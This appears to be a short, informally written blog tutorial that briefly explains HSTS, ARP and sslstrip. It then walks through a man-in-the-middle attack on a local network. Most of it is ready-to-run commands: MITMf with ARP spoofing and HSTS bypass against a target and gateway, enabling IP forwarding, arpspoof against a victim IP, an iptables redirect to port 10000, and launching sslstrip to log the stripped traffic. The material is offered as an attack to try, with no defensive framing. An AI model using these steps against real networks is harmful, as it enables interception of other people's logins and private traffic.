Introduction of HSTS, ARP, And sslstrip
HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.
You have to forward IP By IPTables and send a fake arp request Request.
Lets Do it.
MITMF -(Framework for Man-In-The-Middle attacks)
https://github.com/byt3bl33d3r/MITMf just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section
-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.
run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts
get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n
Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward
start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip
Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
finally Launch sslstrip sslstrip –l 10000
now open new terminal and see results tail -n 50 -f sslstrip.log
Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.